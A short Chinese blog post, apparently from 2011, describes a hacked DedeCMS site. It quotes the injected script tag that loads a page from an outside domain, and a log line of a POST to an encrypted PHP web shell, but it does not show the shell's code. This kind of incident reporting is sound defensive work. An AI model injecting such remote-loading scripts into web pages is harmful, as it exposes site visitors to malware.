首页 > 高级民工 > 一个php木马的解密

一个php木马的解密

2011年3月30日 发表评论 阅读评论

一个朋友的dede站点首页被插入
<script src=”<script src=”http://welcometotheglobalisorg.com/nl.php?p=1″></script>\n
怀疑是被黑了。通过分析日志发现了一条可疑的post提交记录

66.96.128.62 – - [28/Mar/2011:05:33:14 -0700] “POST /data/affection_gris.php HTTP/1.1″ 200 143 “-” “-”

文件affection_gris.php是加密后的文件。
文件源码与解密后的文件:code

google搜索后发现也有部分人遇到这个问题,检测日志也未发现最近几天有可疑的访问dede的记录,似乎affection_gris.php文件突然之间就出现在了网站目录里,所以怀疑是服务器问题,服务器使用的是dreamhost。。另外还遇到个奇怪的问题,我本来想把文件内容直接发布到这篇文章中,但提交的时候总是出现500错误,不知道是wordpress的问题,还是dreamhost服务器的原因。

分类: 高级民工 标签: ,
  1. 2011年8月16日16:55 | #1

    我的一个wd也被挂黑了郁闷哦

点击刷新